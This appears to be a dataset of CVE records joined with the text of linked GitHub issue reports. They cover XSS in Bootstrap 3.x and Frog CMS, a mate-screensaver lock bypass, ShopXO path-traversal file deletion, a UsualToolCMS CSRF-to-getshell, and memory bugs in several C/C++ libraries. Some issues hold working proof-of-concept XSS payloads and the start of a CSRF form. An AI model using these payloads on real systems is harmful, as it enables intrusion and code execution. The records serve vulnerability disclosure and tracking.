[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:getbootstrap:bootstrap:*:*:*:*:*:*:*:*", "matchCriteriaId": "8497B424-E8CC-4FEF-844B-FE33F2C18E6E", "versionEndExcluding": "3.4.0", "versionEndIncluding": null, "versionStart...
[ "79" ]
79
https://github.com/twbs/bootstrap/issues/20184
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "twbs", "bootstrap" ]
The data-target attribute is vulnerable to Cross-Site Scripting attacks: ``` html <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script> <script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js"></script> <button data-toggle="collapse" data-target="<img src=x on...
XSS in data-target attribute
https://api.github.com/repos/twbs/bootstrap/issues/20184/comments
44
2016-06-27T15:33:54Z
2023-08-16T13:52:10Z
https://github.com/twbs/bootstrap/issues/20184
162,481,500
20,184
18
CVE-2016-10735
2019-01-09T05:29:00.883
In Bootstrap 3.x before 3.4.0 and 4.x-beta before 4.0.0-beta.2, XSS is possible in the data-target attribute, a different vulnerability than CVE-2018-14041.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": null, "url": "https://access.redhat.com/errata/RHBA-2019:1076" }, { "source": "cve@mitre.org", "tags": null, "url": "https://access.redhat.com/errata/RHBA-2019:1570" }, { "source": "cve@mitre.org", "tags": null, "url": "https://access....
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:getbootstrap:bootstrap:*:*:*:*:*:*:*:*", "matchCriteriaId": "8497B424-E8CC-4FEF-844B-FE33F2C18E6E", "versionEndExcluding": "3.4.0", "versionEndIncluding": null, "versionStart...
[ "79" ]
79
https://github.com/twbs/bootstrap/issues/27915#issuecomment-452140906
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "twbs", "bootstrap" ]
Github considers Bootstrap 3.4.0 an insecure dependency via its [security vulnerability alerts tool](https://help.github.com/articles/about-security-alerts-for-vulnerable-dependencies). It points to the [NVD CVE-2018-14041](https://nvd.nist.gov/vuln/detail/CVE-2018-14041) page, which shows that only >4.1.2 is secure. I...
Github considers bootstrap 3.4.0 as insecure
https://api.github.com/repos/twbs/bootstrap/issues/27915/comments
19
2018-12-23T16:23:10Z
2019-02-04T07:45:21Z
https://github.com/twbs/bootstrap/issues/27915
393,762,774
27,915
19
CVE-2018-20676
2019-01-09T05:29:01.287
In Bootstrap before 3.4.0, XSS is possible in the tooltip data-viewport attribute.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": null, "url": "https://access.redhat.com/errata/RHBA-2019:1076" }, { "source": "cve@mitre.org", "tags": null, "url": "https://access.redhat.com/errata/RHBA-2019:1570" }, { "source": "cve@mitre.org", "tags": null, "url": "https://access....
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:getbootstrap:bootstrap:*:*:*:*:*:*:*:*", "matchCriteriaId": "C5E9597E-65BB-4E8A-B0E8-467D2903511B", "versionEndExcluding": "3.4.0", "versionEndIncluding": null, "versionStart...
[ "79" ]
79
https://github.com/twbs/bootstrap/issues/27044
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "twbs", "bootstrap" ]
found in bootstrap 3.3.7 `<a href="#" data-toggle="tooltip" data-viewport="<img src=1 onerror=alert(123) />" title="Hooray!">Hover over me</a>` https://jsbin.com/qipirurise/edit?html,output Win 7 x64 Chrome 67.0.3396.99 Firefox 61.0.1 (64-Bit)
tooltip - XSS on data-viewport attribute
https://api.github.com/repos/twbs/bootstrap/issues/27044/comments
0
2018-08-10T09:04:03Z
2018-08-13T16:10:06Z
https://github.com/twbs/bootstrap/issues/27044
349,433,528
27,044
20
CVE-2018-20676
2019-01-09T05:29:01.287
In Bootstrap before 3.4.0, XSS is possible in the tooltip data-viewport attribute.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": null, "url": "https://access.redhat.com/errata/RHBA-2019:1076" }, { "source": "cve@mitre.org", "tags": null, "url": "https://access.redhat.com/errata/RHBA-2019:1570" }, { "source": "cve@mitre.org", "tags": null, "url": "https://access....
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:getbootstrap:bootstrap:*:*:*:*:*:*:*:*", "matchCriteriaId": "C5E9597E-65BB-4E8A-B0E8-467D2903511B", "versionEndExcluding": "3.4.0", "versionEndIncluding": null, "versionStart...
[ "79" ]
79
https://github.com/twbs/bootstrap/issues/27915#issuecomment-452196628
[ "Third Party Advisory" ]
github.com
[ "twbs", "bootstrap" ]
Github considers Bootstrap 3.4.0 an insecure dependency via its [security vulnerability alerts tool](https://help.github.com/articles/about-security-alerts-for-vulnerable-dependencies). It points to the [NVD CVE-2018-14041](https://nvd.nist.gov/vuln/detail/CVE-2018-14041) page, which shows that only >4.1.2 is secure. I...
Github considers bootstrap 3.4.0 as insecure
https://api.github.com/repos/twbs/bootstrap/issues/27915/comments
19
2018-12-23T16:23:10Z
2019-02-04T07:45:21Z
https://github.com/twbs/bootstrap/issues/27915
393,762,774
27,915
21
CVE-2018-20677
2019-01-09T05:29:01.397
In Bootstrap before 3.4.0, XSS is possible in the affix configuration target property.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": null, "url": "https://access.redhat.com/errata/RHBA-2019:1076" }, { "source": "cve@mitre.org", "tags": null, "url": "https://access.redhat.com/errata/RHBA-2019:1570" }, { "source": "cve@mitre.org", "tags": null, "url": "https://access....
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:getbootstrap:bootstrap:*:*:*:*:*:*:*:*", "matchCriteriaId": "C5E9597E-65BB-4E8A-B0E8-467D2903511B", "versionEndExcluding": "3.4.0", "versionEndIncluding": null, "versionStart...
[ "79" ]
79
https://github.com/twbs/bootstrap/issues/27045
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "twbs", "bootstrap" ]
found in bootstrap 3.3.7 `$('.js-affixed-element-top').affix({ offset: { top: $('.js-page-header').outerHeight(true) - 10 , bottom: $('.js-footer').outerHeight(true) + 10 }, target: '<img src=x onerror=alert(0)>' })` https://jsbin.com/palokaxina/edit?html,output Win 7 x64 Chrome ...
affix - XSS on target config
https://api.github.com/repos/twbs/bootstrap/issues/27045/comments
0
2018-08-10T09:07:08Z
2018-08-13T16:10:22Z
https://github.com/twbs/bootstrap/issues/27045
349,434,502
27,045
22
CVE-2018-20680
2019-01-09T17:29:00.247
Frog CMS 0.9.5 has XSS in the admin/?/page/edit/1 body field.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/philippe/FrogCMS/issues/22" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Pa...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:frog_cms_project:frog_cms:0.9.5:*:*:*:*:*:*:*", "matchCriteriaId": "BC916FD5-B582-4EC0-AD00-BD72FCF82BF3", "versionEndExcluding": null, "versionEndIncluding": null, "versionS...
[ "79" ]
79
https://github.com/philippe/FrogCMS/issues/22
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "philippe", "FrogCMS" ]
## Frog CMS 0.9.5 has xss in /FrogCMS/admin/?/page/edit/1 body field ### 1.login ### 2.Input exp `<img src=1 onerror=alert(/du/)>` ![image](https://user-images.githubusercontent.com/30485210/50556394-8c3f2900-0d13-11e9-8346-ced58cab4346.png) ### 3.save and close ### 4.open http://127.0.0.1/FrogCMS/index.php ![ima...
Frog CMS 0.9.5 has xss in /FrogCMS/admin/?/page/edit/1 body field
https://api.github.com/repos/philippe/FrogCMS/issues/22/comments
0
2018-12-31T07:53:42Z
2018-12-31T07:53:42Z
https://github.com/philippe/FrogCMS/issues/22
394,943,057
22
23
CVE-2018-20681
2019-01-09T23:29:05.230
mate-screensaver before 1.20.2 in MATE Desktop Environment allows physically proximate attackers to view screen content and possibly control applications. By unplugging and re-plugging or power-cycling external output devices (such as additionally attached graphical outputs via HDMI, VGA, DVI, etc.) the content of a sc...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 3.6, "confidentialityImpact": "PARTIAL", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/mate-desktop/mate-screensaver/issues/152" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://g...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mate-desktop:mate-screensaver:*:*:*:*:*:*:*:*", "matchCriteriaId": "795C0DDF-0421-4B68-9B1D-E054518D0BF0", "versionEndExcluding": "1.20.2", "versionEndIncluding": null, "vers...
[ "200" ]
200
https://github.com/mate-desktop/mate-screensaver/issues/152
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "mate-desktop", "mate-screensaver" ]
#### Expected behaviour mate-screensaver should keep the user's session locked until valid authentication has taken place (password entered, etc.) #### Actual behaviour & steps to reproduce the behaviour Do the following: 1. Have two display-port attached displays on a fresh install of Fedora 27. Mine are in por...
mate-screensaver does not maintain user lockout / screen lock under certain conditions
https://api.github.com/repos/mate-desktop/mate-screensaver/issues/152/comments
9
2018-04-10T19:53:17Z
2019-01-10T14:04:12Z
https://github.com/mate-desktop/mate-screensaver/issues/152
313,066,344
152
24
CVE-2018-20681
2019-01-09T23:29:05.230
mate-screensaver before 1.20.2 in MATE Desktop Environment allows physically proximate attackers to view screen content and possibly control applications. By unplugging and re-plugging or power-cycling external output devices (such as additionally attached graphical outputs via HDMI, VGA, DVI, etc.) the content of a sc...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 3.6, "confidentialityImpact": "PARTIAL", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/mate-desktop/mate-screensaver/issues/152" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://g...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mate-desktop:mate-screensaver:*:*:*:*:*:*:*:*", "matchCriteriaId": "795C0DDF-0421-4B68-9B1D-E054518D0BF0", "versionEndExcluding": "1.20.2", "versionEndIncluding": null, "vers...
[ "200" ]
200
https://github.com/mate-desktop/mate-screensaver/issues/155
[ "Exploit", "Third Party Advisory" ]
github.com
[ "mate-desktop", "mate-screensaver" ]
#### Expected behaviour Lock Screen Turn off monitor (either by power management putting it to sleep, or by pressing power button) Turn monitor on Start typing Expect to see lock screen on monitor #### Actual behaviour Lock Screen Turn off monitor Turn monitor on Start typing Expect to see lock screen on m...
mate-screensaver screen lock can be bypassed by power cycling monitor [$110]
https://api.github.com/repos/mate-desktop/mate-screensaver/issues/155/comments
60
2018-05-01T20:44:51Z
2021-07-21T13:48:18Z
https://github.com/mate-desktop/mate-screensaver/issues/155
319,321,909
155
25
CVE-2018-20681
2019-01-09T23:29:05.230
mate-screensaver before 1.20.2 in MATE Desktop Environment allows physically proximate attackers to view screen content and possibly control applications. By unplugging and re-plugging or power-cycling external output devices (such as additionally attached graphical outputs via HDMI, VGA, DVI, etc.) the content of a sc...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 3.6, "confidentialityImpact": "PARTIAL", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/mate-desktop/mate-screensaver/issues/152" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://g...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mate-desktop:mate-screensaver:*:*:*:*:*:*:*:*", "matchCriteriaId": "795C0DDF-0421-4B68-9B1D-E054518D0BF0", "versionEndExcluding": "1.20.2", "versionEndIncluding": null, "vers...
[ "200" ]
200
https://github.com/mate-desktop/mate-screensaver/issues/170
[ "Third Party Advisory" ]
github.com
[ "mate-desktop", "mate-screensaver" ]
#### Expected behaviour When plug / unplug a monitor, Lock Screen should work like before #### Actual behaviour When plug / unplug a monitor, Lock Screen does not work unless I restart mate-screensaver #### Steps to reproduce the behaviour - Login to MATE with a laptop while external monitor is attached via ...
Lock Screen not working after monitor plugged / unplugged (need to restart mate-screensaver)
https://api.github.com/repos/mate-desktop/mate-screensaver/issues/170/comments
5
2018-09-14T04:52:26Z
2019-04-25T14:45:47Z
https://github.com/mate-desktop/mate-screensaver/issues/170
360,155,930
170
26
CVE-2019-5887
2019-01-10T14:29:00.243
An issue was discovered in ShopXO 1.2.0. In the UnlinkDir method of the FileUtil.php file, the input parameters are not checked, resulting in input mishandling by the rmdir method. Attackers can delete arbitrary files by using "../" directory traversal.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gongfuxiang/shopxo/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:shopxo:shopxo:1.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "3AD3B139-3799-4449-A2A9-6AC6860F732D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludin...
[ "22" ]
22
https://github.com/gongfuxiang/shopxo/issues/2
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gongfuxiang", "shopxo" ]
后台删除文件处由于没有对文件名做校验导致可以通过../进行回溯来删除任意文件夹,删除install文件(锁文件所在的文件夹)时,可以重装系统 在Appminialipaylist.php文件中,params是受控制的: ![default](https://user-images.githubusercontent.com/39950310/50682006-6766f080-1048-11e9-9440-cb5f72912efb.png) 进入delete方法中,当不是zip结尾时会认为是文件夹 ![default](https://user-images.githubusercontent.com/39950310/50...
后台任意文件删除漏洞
https://api.github.com/repos/gongfuxiang/shopxo/issues/2/comments
3
2019-01-04T09:55:55Z
2021-01-19T15:01:28Z
https://github.com/gongfuxiang/shopxo/issues/2
395,867,573
2
28
CVE-2017-1002152
2019-01-10T21:29:00.220
Bodhi 2.9.0 and lower is vulnerable to cross-site scripting resulting in code injection caused by incorrect validation of bug titles.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "patrick@puiterwijk.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/fedora-infra/bodhi/issues/1740" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:bodhi:*:*:*:*:*:*:*:*", "matchCriteriaId": "F9A4DD02-BC9C-4FCB-A583-59421CCEDD04", "versionEndExcluding": null, "versionEndIncluding": "2.9.0", "versionStartExcluding"...
[ "79" ]
79
https://github.com/fedora-infra/bodhi/issues/1740
[ "Exploit", "Issue Tracking" ]
github.com
[ "fedora-infra", "bodhi" ]
[Marcel reported](https://bugzilla.redhat.com/show_bug.cgi?id=1478587) that it is possible to inject JavaScript into Bodhi's web interface through Bugzilla ticket subjects. The reporter cited [an update](https://bodhi.fedoraproject.org/updates/FEDORA-2017-3c92db10b8) that did not properly escape tags from the bug it wa...
CVE-2017-1002152: JavaScript injection via Bugzilla ticket subjects
https://api.github.com/repos/fedora-infra/bodhi/issues/1740/comments
1
2017-08-10T15:53:09Z
2017-08-15T21:20:57Z
https://github.com/fedora-infra/bodhi/issues/1740
249,394,149
1,740
29
CVE-2019-6129
2019-01-11T05:29:01.640
png_create_info_struct in png.c in libpng 1.6.36 has a memory leak, as demonstrated by pngcp. NOTE: a third party has stated "I don't think it is libpng's job to free this buffer.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/glennrp/libpng/issues/269" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libpng:libpng:1.6.36:*:*:*:*:*:*:*", "matchCriteriaId": "F9E98605-E9D5-4A8A-8858-C4AF1236AB6D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludi...
[ "401" ]
401
https://github.com/glennrp/libpng/issues/269
[ "Exploit", "Third Party Advisory" ]
github.com
[ "glennrp", "libpng" ]
Hi,libpng team. there is a memory leak in the file png.c:368 of function png_create_info_struct. the bug is trigered by `./pngcp poc /dev/null` [libpng_poc.zip](https://github.com/glennrp/libpng/files/2729282/libpng_poc.zip) the asan debug info is as follows: ===========================================...
memory leak in png_create_info_struct
https://api.github.com/repos/pnggroup/libpng/issues/269/comments
13
2019-01-05T07:23:28Z
2023-01-08T15:27:24Z
https://github.com/pnggroup/libpng/issues/269
396,141,975
269
30
CVE-2019-6132
2019-01-11T05:29:01.763
An issue was discovered in Bento4 v1.5.1-627. There is a memory leak in AP4_DescriptorFactory::CreateDescriptorFromStream in Core/Ap4DescriptorFactory.cpp when called from the AP4_EsdsAtom class in Core/Ap4EsdsAtom.cpp, as demonstrated by mp42aac.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/357" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https:...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.5.1-627:*:*:*:*:*:*:*", "matchCriteriaId": "F87642DF-B939-4195-A2AE-F0F1D39CD16D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
[ "401" ]
401
https://github.com/axiomatic-systems/Bento4/issues/357
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
there is memory leaks in Ap4String.cpp ./mp42aac poc /dev/null ================================================================= ==15810==ERROR: LeakSanitizer: detected memory leaks Direct leak of 96 byte(s) in 1 object(s) allocated from: #0 0x522860 in operator new(unsigned long) (/root/apps/Bento4...
memory leaks in Ap4String.cpp
https://api.github.com/repos/axiomatic-systems/Bento4/issues/357/comments
1
2019-01-10T17:00:31Z
2019-01-12T09:36:13Z
https://github.com/axiomatic-systems/Bento4/issues/357
397,925,621
357
31
CVE-2019-6135
2019-01-11T17:29:00.273
An issue has been found in libIEC61850 v1.3.1. Memory_malloc in hal/memory/lib_memory.c has a memory leak when called from Asn1PrimitiveValue_create in mms/asn1/asn1_ber_primitive_value.c, as demonstrated by goose_publisher_example.c and iec61850_9_2_LE_example.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/mz-automation/libiec61850/issues/103" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/mz-automa...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mz-automation:libiec61850:1.3.1:*:*:*:*:*:*:*", "matchCriteriaId": "A3197989-9E64-49DA-875C-7EF8A7697B1B", "versionEndExcluding": null, "versionEndIncluding": null, "versionS...
[ "401" ]
401
https://github.com/mz-automation/libiec61850/issues/103
[ "Exploit", "Third Party Advisory" ]
github.com
[ "mz-automation", "libiec61850" ]
Hi team, Their are multiple memory leaks in `mms_mapping.c` and `mms_value.c` Snip **[mms_value.c](https://github.com/mz-automation/libiec61850/blob/v1.3/src/mms/iso_mms/common/mms_value.c#L1583-L1600)** ``` self->value.visibleString.buf = (char*) GLOBAL_MALLOC(size + 1); if (self->value.visibleStri...
Memory leaks in mms_mapping.c & mms_value.c
https://api.github.com/repos/mz-automation/libiec61850/issues/103/comments
2
2019-01-11T10:26:24Z
2019-03-25T22:33:21Z
https://github.com/mz-automation/libiec61850/issues/103
398,225,876
103
32
CVE-2019-6135
2019-01-11T17:29:00.273
An issue has been found in libIEC61850 v1.3.1. Memory_malloc in hal/memory/lib_memory.c has a memory leak when called from Asn1PrimitiveValue_create in mms/asn1/asn1_ber_primitive_value.c, as demonstrated by goose_publisher_example.c and iec61850_9_2_LE_example.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/mz-automation/libiec61850/issues/103" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/mz-automa...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mz-automation:libiec61850:1.3.1:*:*:*:*:*:*:*", "matchCriteriaId": "A3197989-9E64-49DA-875C-7EF8A7697B1B", "versionEndExcluding": null, "versionEndIncluding": null, "versionS...
[ "401" ]
401
https://github.com/mz-automation/libiec61850/issues/104
[ "Exploit", "Third Party Advisory" ]
github.com
[ "mz-automation", "libiec61850" ]
Hi team, Their are multiple memory leaks in `goose_publisher_example.c` Snip **[goose_publisher_example.c](https://github.com/mz-automation/libiec61850/blob/v1.3/examples/goose_publisher/goose_publisher_example.c#L30)** ``` LinkedList_add(dataSetValues, MmsValue_newIntegerFromInt32(1234)); LinkedList_add(da...
Memeory leak in goose_publisher_example.c
https://api.github.com/repos/mz-automation/libiec61850/issues/104/comments
2
2019-01-11T12:32:48Z
2019-03-25T22:25:41Z
https://github.com/mz-automation/libiec61850/issues/104
398,270,546
104
33
CVE-2019-6137
2019-01-11T17:29:00.383
An issue was discovered in lib60870 2.1.1. LinkLayer_setAddress in link_layer/link_layer.c has a NULL pointer dereference.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/mz-automation/lib60870/issues/39" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://g...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mz-automation:lib60870:2.1.1:*:*:*:*:*:*:*", "matchCriteriaId": "D248DC3D-FB81-4C1E-9AA2-34C6A940CFBD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStar...
[ "476" ]
476
https://github.com/mz-automation/lib60870/issues/39
[ "Exploit", "Third Party Advisory" ]
github.com
[ "mz-automation", "lib60870" ]
Hi team, There is a NULL pointer dereference in `link_layer.c` Snip **[link_layer.c](https://github.com/mz-automation/lib60870/blob/master/lib60870-C/src/iec60870/link_layer/link_layer.c#L142)** ``` LinkLayer_setAddress(LinkLayer self, int address) { self->address = address; } ``` ## Stack-trace ``...
NULL pointer dereference in link_layer.c
https://api.github.com/repos/mz-automation/lib60870/issues/39/comments
3
2019-01-11T12:49:26Z
2019-02-19T20:19:14Z
https://github.com/mz-automation/lib60870/issues/39
398,275,787
39
34
CVE-2019-6244
2019-01-12T02:29:00.357
An issue was discovered in UsualToolCMS 8.0. cmsadmin/a_sqlbackx.php?t=sql allows CSRF attacks that can execute SQL statements, and consequently execute arbitrary PHP code by writing that code into a .php file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/fdbao/UsualToolCMS/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:usualtool:usualtoolcms:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "FEAAD3B3-D0DF-4FED-938B-6F89F59301A3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartE...
[ "352" ]
352
https://github.com/fdbao/UsualToolCMS/issues/1
[ "Exploit", "Third Party Advisory" ]
github.com
[ "fdbao", "UsualToolCMS" ]
If you want to use the vulnerability, you need to have the MySQL operation rights First, generating CSRF POC and inserting a line of data containing PHP malicious codes into CMS_water ``` <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://127.0.0.1/usualToolCMS/cmsadmin/a_sql...
usualToolCMS CSRF getshell
https://api.github.com/repos/fdbao/UsualToolCMS/issues/1/comments
0
2019-01-09T08:28:22Z
2019-01-09T08:30:27Z
https://github.com/fdbao/UsualToolCMS/issues/1
397,260,318
1
35
CVE-2019-6245
2019-01-13T00:29:00.477
An issue was discovered in Anti-Grain Geometry (AGG) 2.4 as used in SVG++ (aka svgpp) 1.2.3. In the function agg::cell_aa::not_equal, dx is assigned to (x2 - x1). If dx >= dx_limit, which is (16384 << poly_subpixel_shift), this function will call itself recursively. There can be a situation where (x2 - x1) is always bi...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/svgpp/svgpp/issues/70" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.or...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:antigrain:agg:2.4:*:*:*:*:*:*:*", "matchCriteriaId": "5B11FD8B-B7E4-44AD-82BA-397070170963", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding"...
[ "787" ]
787
https://github.com/svgpp/svgpp/issues/70
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "svgpp", "svgpp" ]
### bug1: an oob-read bug **description** A type confusion bug lead to out-of-bound read in src/demo/svgpp_agg_render. buffer.pixfmt() should return a reference to pixfmt_alpha_blend_rgba but instead return some struct that look like a long+string. That is why it crashes when it simply get the member stride. This ...
4 bugs found in svgpp
https://api.github.com/repos/svgpp/svgpp/issues/70/comments
2
2019-01-12T11:41:38Z
2019-02-04T19:30:12Z
https://github.com/svgpp/svgpp/issues/70
398,546,864
70
36
CVE-2019-6250
2019-01-13T15:29:00.547
A pointer overflow, with code execution, was discovered in ZeroMQ libzmq (aka 0MQ) 4.2.x and 4.3.x before 4.3.1. A v2_decoder.cpp zmq::v2_decoder_t::size_ready integer overflow allows an authenticated attacker to overwrite an arbitrary amount of bytes beyond the bounds of a buffer, which can be leveraged to run arbitra...
